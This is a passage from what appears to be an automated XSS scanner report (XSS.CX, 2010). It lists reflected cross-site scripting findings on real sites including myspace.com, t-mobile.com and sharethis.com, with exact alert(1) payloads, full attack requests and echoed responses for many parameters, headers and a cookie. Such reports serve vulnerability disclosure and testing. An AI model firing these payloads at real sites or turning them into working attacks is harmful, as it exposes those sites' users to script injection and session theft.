Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /Search-Engine-ftopict7472.html/x26amp HTTP/1.1 Host: www.mobythreads.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3c03b'style%3d'x%3aexpression(alert(1))'d7b136562ff
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>IIS 6 Search Engine</title> <META NAME="DESCRIPTION" CONTENT="Hi, I migrated our IIS4 server to a 2003 server/IIS6 ...[SNIP]... <a rel=nofollow href="http://www.mobythreads.com/modules.php?name=Forums&file=faq&page=alert&type=s&t=7472&f=4" title='Get periodic alerts about "3c03b'style='x:expression(alert(1))'d7b136562ff"'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f505a'style%3d'x%3aexpression(alert(1))'db2579db070 was submitted in the Referer HTTP header. This input was echoed as f505a'style='x:expression(alert(1))'db2579db070 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /component-add-remove-ftopict7049.html/x26amp HTTP/1.1 Host: www.mobythreads.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f505a'style%3d'x%3aexpression(alert(1))'db2579db070
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>IIS is not at component add/remove what do i do?</title> <META NAME="DESCRIPTION" CONTENT="I have visual studio an ...[SNIP]... <a rel=nofollow href="http://www.mobythreads.com/modules.php?name=Forums&file=faq&page=alert&type=s&t=7049&f=4" title='Get periodic alerts about "f505a'style='x:expression(alert(1))'db2579db070"'> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95860'-alert(1)-'a11d17166de was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/Phones/cell-phone-detail.aspx HTTP/1.1 Host: www.t-mobile.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)95860'-alert(1)-'a11d17166de Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media=" ...[SNIP]... ript'> lpAddVars('session','LPTMONewCustomer', 'true'); lpAddVars('session','LPTMOExistingcustomer', 'false'); lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)95860'-alert(1)-'a11d17166de'); lpAddVars('page','LPTMOIsSpanishUser', 'false'); </script> ...[SNIP]...
2.339. http://myspace.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://myspace.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6738"><script>alert(1)</script>4740c637355 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?d6738"><script>alert(1)</script>4740c637355=1 HTTP/1.1 Host: myspace.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/?d6738"><script>alert(1)</script>4740c637355=1">here</a>.</h2></body></html>
The value of the d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6f79"><script>alert(1)</script>815ba934250 was submitted in the d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}e6f79"><script>alert(1)</script>815ba934250 HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}e6f79"><script>alert(1)</script>815ba934250"> ...[SNIP]...
The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86957"><script>alert(1)</script>6e4e771c7cc was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results86957"><script>alert(1)</script>6e4e771c7cc&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results86957"><script>alert(1)</script>6e4e771c7cc&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the g request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35f7b"><script>alert(1)</script>d5606f113d5 was submitted in the g parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}35f7b"><script>alert(1)</script>d5606f113d5&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}35f7b"><script>alert(1)</script>d5606f113d5&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85526"><script>alert(1)</script>df67b4d4c06 was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}85526"><script>alert(1)</script>df67b4d4c06&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}85526"><script>alert(1)</script>df67b4d4c06&d={myspace:distance?}"> ...[SNIP]...
The value of the maxAge request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a12"><script>alert(1)</script>8f03734cf6a was submitted in the maxAge parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}c7a12"><script>alert(1)</script>8f03734cf6a&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}c7a12"><script>alert(1)</script>8f03734cf6a&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the minAge request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a70"><script>alert(1)</script>4b34c3381c2 was submitted in the minAge parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}69a70"><script>alert(1)</script>4b34c3381c2&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}69a70"><script>alert(1)</script>4b34c3381c2&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
2.346. http://searchservice.myspace.com/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://searchservice.myspace.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c94d"><script>alert(1)</script>2e19ff9bd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?2c94d"><script>alert(1)</script>2e19ff9bd0=1 HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?2c94d"><script>alert(1)</script>2e19ff9bd0=1">here</a>.</h2></body></html>
The value of the npic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 512a2"><script>alert(1)</script>c2b5ad80478 was submitted in the npic parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}512a2"><script>alert(1)</script>c2b5ad80478&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}512a2"><script>alert(1)</script>c2b5ad80478&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the pg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26fd5"><script>alert(1)</script>b999b18a3c5 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}26fd5"><script>alert(1)</script>b999b18a3c5&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}26fd5"><script>alert(1)</script>b999b18a3c5&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the qry request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d575c"><script>alert(1)</script>62edbd18ab7 was submitted in the qry parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}d575c"><script>alert(1)</script>62edbd18ab7&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}d575c"><script>alert(1)</script>62edbd18ab7&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6df9"><script>alert(1)</script>cedc8e5bf51 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=Peopleb6df9"><script>alert(1)</script>cedc8e5bf51&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=Peopleb6df9"><script>alert(1)</script>cedc8e5bf51&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 3c944<script>alert(1)</script>c8518326800 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?rnd=1292087965340 HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://www.myspace.com/search/people?q='&ac=t Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CtZmwEyzRb19rULmKqKUAg==3c944<script>alert(1)</script>c8518326800
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Sat, 11 Dec 2010 17:21:35 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 Content-Length: 639
<html> <head><title>ShareThis Segmenter</title></head> <body> <script type="text/javascript"> var google_conversion_id = 1036609180; var google_conversion_language = "en"; var goo ...[SNIP]... <div style='display:none'>clicookie:CtZmwEyzRb19rULmKqKUAg==3c944<script>alert(1)</script>c8518326800 userid: </div> ...[SNIP]...
Report generated by XSS.CX at Sat Dec 11 15:13:56 CST 2010.